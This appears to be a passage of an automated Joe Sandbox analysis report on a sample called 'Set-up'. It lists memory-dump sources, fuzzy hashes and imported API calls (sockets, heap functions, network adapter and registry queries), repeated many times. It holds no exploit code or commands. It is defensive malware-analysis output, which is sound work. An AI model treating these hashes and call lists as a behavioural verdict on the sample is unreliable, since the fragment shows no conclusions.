                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: malloc$memcpystrlen
                            • String ID:
                            • API String ID: 3553820921-0
                            • Opcode ID: 81a43ea299ffb59f68d53456286ce3524b7ded014250a5b64895261b39ac7567
                            • Instruction ID: 641105e6ba7c39f0021cecbd60c1dc77b4d4986cb84f4cd9236b7dedd2c3c913
                            • Opcode Fuzzy Hash: 81a43ea299ffb59f68d53456286ce3524b7ded014250a5b64895261b39ac7567
                            • Instruction Fuzzy Hash: D5314675A043198FCB24DF65E988359BBF2FB48300F05896DD948A7361D735A80ACF81
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: malloc$memcpystrlen
                            • String ID:
                            • API String ID: 3553820921-0
                            • Opcode ID: df9c904153cd4f666b3719e70af9662c2ff01e042294a0ab3fbd4321e00669cd
                            • Instruction ID: 54c1e03e5df2dcd2647dc18a46b9b3e1e3e1430bc34d5f0a0b9be97d3dd4c697
                            • Opcode Fuzzy Hash: df9c904153cd4f666b3719e70af9662c2ff01e042294a0ab3fbd4321e00669cd
                            • Instruction Fuzzy Hash: 3221F5B59087198FCB14EF65E98866DBBF2FB88700F15896ED945A7320E730A906CF41
                            APIs
                            • AcquireSRWLockExclusive.KERNEL32(00E3D044,0080208F), ref: 00803AB5
                            • ReleaseSRWLockExclusive.KERNEL32(00E3D044,00E3D044,0080208F), ref: 00803AD0
                            • ReleaseSRWLockExclusive.KERNEL32(00E3D044), ref: 00803B02
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ExclusiveLock$Release$Acquire
                            • String ID:
                            • API String ID: 1021914862-0
                            • Opcode ID: 25d168e4d2fb56a0874973c45a10678465ae6253d27f990a4dc27899e2b3adb9
                            • Instruction ID: 7cb958918345c53386603a5ab780d74faa7665191e700c243e5eb28df3fc84f8
                            • Opcode Fuzzy Hash: 25d168e4d2fb56a0874973c45a10678465ae6253d27f990a4dc27899e2b3adb9
                            • Instruction Fuzzy Hash: 41E04F202082255EC616BB75FC4BE0829B6FB80F00FC404607104F00B2EE7C8C4ACF67
                            APIs
                            • closesocket.WS2_32(?), ref: 008078BB
                              • Part of subcall function 008072A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 008072F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: closesocketfwrite
                            • String ID: FD %s:%d sclose(%d)
                            • API String ID: 1967222983-3116021458
                            • Opcode ID: e9d06ea0755e24a3493a8ff0de0bc8db7697265ed6d6f9b4ec00ecfc134b30ed
                            • Instruction ID: 8d970f407a80c5794dac7e89fcc96b8e5462fb010bcca6be841860deed13e79c
                            • Opcode Fuzzy Hash: e9d06ea0755e24a3493a8ff0de0bc8db7697265ed6d6f9b4ec00ecfc134b30ed
                            • Instruction Fuzzy Hash: F9D05E32E092206B86206A99BC48C5B7BA8EEC6F61B090868F841B7244D230AC41C7F2
                            APIs
                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 008B72FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _stricmp
                            • String ID:
                            • API String ID: 2884411883-0
                            • Opcode ID: 7128dc152f90e97e04cf400d97cb7edbd5996412a2ca5e2da2462a0a94bc8b61
                            • Instruction ID: 2f59332d311c632230dfd7d2ad7dbf77bfabc9a8d889dbac573f90ca53ce81ba
                            • Opcode Fuzzy Hash: 7128dc152f90e97e04cf400d97cb7edbd5996412a2ca5e2da2462a0a94bc8b61
                            • Instruction Fuzzy Hash: 24C15FB19083049FEB10AB28DC86BAB77A9FF94308F44046CF949D6352E771ED54D6A3
                            APIs
                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00C982BF), ref: 00C98229
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00C982BF), ref: 00C9824C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errnorealloc
                            • String ID:
                            • API String ID: 3650671883-0
                            • Opcode ID: c660daa45a0a7d75d31a0687e5fe11baec3865b1e154b9568993cea44d839fc6
                            • Instruction ID: e2da883be6c516b343dcf8b6bd7fa4f9935ada55e491384fdd6e0f9e308324ff
                            • Opcode Fuzzy Hash: c660daa45a0a7d75d31a0687e5fe11baec3865b1e154b9568993cea44d839fc6
                            • Instruction Fuzzy Hash: 21F0B471500E118FCF109F38D8C8059B7E4BB073207654796E924CB2E5EB30CD8ADBA1
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,0097D471,00000050,crypto/bio/bio_lib.c,00000053,?,?,?,0097D52B,00000000,00801A70,009848ED,00D4BAFC), ref: 009DCA8C
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,00801A70), ref: 009DCA9E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: mallocmemset
                            • String ID:
                            • API String ID: 2882185209-0
                            • Opcode ID: 201752ccbd44ed30cee061b0ecfcd773c145d4f7179bcc5c657e0996e1953bf3
                            • Instruction ID: 2c1f136301b3ce1549b2570767807f6096f9f3934674b49265e04cea7d03eb86
                            • Opcode Fuzzy Hash: 201752ccbd44ed30cee061b0ecfcd773c145d4f7179bcc5c657e0996e1953bf3
                            • Instruction Fuzzy Hash: F401D4E57853472BEA20E6B57C86B5B6B8C8BD1764F184436F904E2382E695DC18C3B2
                            APIs
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00C92C31), ref: 00C932B3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 34f5ec552dc2431029a15b4f900bd66bf85ec7503c869a05c09d27c01f5b4034
                            • Instruction ID: 28d94038f36777fcbc0b4e05efe8f785d5933506690aeff48c343163ac7b51e5
                            • Opcode Fuzzy Hash: 34f5ec552dc2431029a15b4f900bd66bf85ec7503c869a05c09d27c01f5b4034
                            • Instruction Fuzzy Hash: 8801BBB4604A408BDF54BFB9C4C952A77E0BF55300F5548ADE884CB357D734DA90DB92
                            APIs
                            • getsockname.WS2_32(?,?,00000080), ref: 008CAFD0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: getsockname
                            • String ID:
                            • API String ID: 3358416759-0
                            • Opcode ID: 7794bd67eb812db2fad65843058ca6744768c5243b39937756849934cf4350eb
                            • Instruction ID: be5e5b843c1f02b3e39c9ef4e7fcc5bf362388f06a97d3673df6a3b39f4aaf22
                            • Opcode Fuzzy Hash: 7794bd67eb812db2fad65843058ca6744768c5243b39937756849934cf4350eb
                            • Instruction Fuzzy Hash: 92119A70808B84D6EB258F18D402BE6B3F4FFD0329F10851DE59942550F77295C5CBC2
                            APIs
                            • send.WS2_32(?,?,?,00000000), ref: 008CA97E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: send
                            • String ID:
                            • API String ID: 2809346765-0
                            • Opcode ID: 6ccad3f8ea12a280c5160a9f72ca00269fb6c957eacd3625fa77d51fe40bbf03
                            • Instruction ID: adc858495db40d1c48cde8775efcb8912a8a7c3e50febb88dc9762aed8663e4c
                            • Opcode Fuzzy Hash: 6ccad3f8ea12a280c5160a9f72ca00269fb6c957eacd3625fa77d51fe40bbf03
                            • Instruction Fuzzy Hash: 19018F75B00714AFC6148F15DC45F56BBA5FF84720F06825DEA986B361C331AC158B92
                            APIs
                            • recv.WS2_32(000000FF,008B6F4E,000000FF,00000000), ref: 008CA8AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: adf642d950ba3cc38e301ee3217159f86e8ff7c69a333b83df6cf24b2fe0fe58
                            • Instruction ID: 9e5a85da945657f9ea0205e6e7522869cf2cdf7201f8d989528e43a7ef74af13
                            • Opcode Fuzzy Hash: adf642d950ba3cc38e301ee3217159f86e8ff7c69a333b83df6cf24b2fe0fe58
                            • Instruction Fuzzy Hash: 1DF01C76B047206FD5248A18EC05F9BF369FBC4B20F148959B954672488370BC4186E2
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: closesocket
                            • String ID:
                            • API String ID: 2781271927-0
                            • Opcode ID: 3c7fb29559e7cbe271b549956dc72565217e5d16a910bb5c39a8359328f683af
                            • Instruction ID: ddd7af7b6fc7ccc962409cedbb14708d131b14f719ae45bcc8379fc6057a4c3b
                            • Opcode Fuzzy Hash: 3c7fb29559e7cbe271b549956dc72565217e5d16a910bb5c39a8359328f683af
                            • Instruction Fuzzy Hash: 5BE0EC74A00A019BCE149A54C989F57777BBFC0721F68CA6CF42C8A555D73ADC47CA41
                            APIs
                            • ioctlsocket.WS2_32(?,8004667E), ref: 008667FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ioctlsocket
                            • String ID:
                            • API String ID: 3577187118-0
                            • Opcode ID: 63f121ec62c4a9929db000366966e9d3e5edc6a57f0ede87b3c8c51af83cbc6c
                            • Instruction ID: 49fdd38025a12a5e6c9c15b25b772995ffd80ed00cfcea7e30926d42522d9e3c
                            • Opcode Fuzzy Hash: 63f121ec62c4a9929db000366966e9d3e5edc6a57f0ede87b3c8c51af83cbc6c
                            • Instruction Fuzzy Hash: 11C012F5108200EFCB084B25D849A5E7BE9EB48296F01441CF046D2150DB749494CF16
                            APIs
                              • Part of subcall function 008BA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA499
                              • Part of subcall function 008BA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA4FB
                              • Part of subcall function 008BA440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008BAA19
                              • Part of subcall function 008B9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,008B92A4,?,?,?,?,?,?,?,?,00000000), ref: 008B9B6E
                              • Part of subcall function 008B9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,008B4860,00000000), ref: 008B9C24
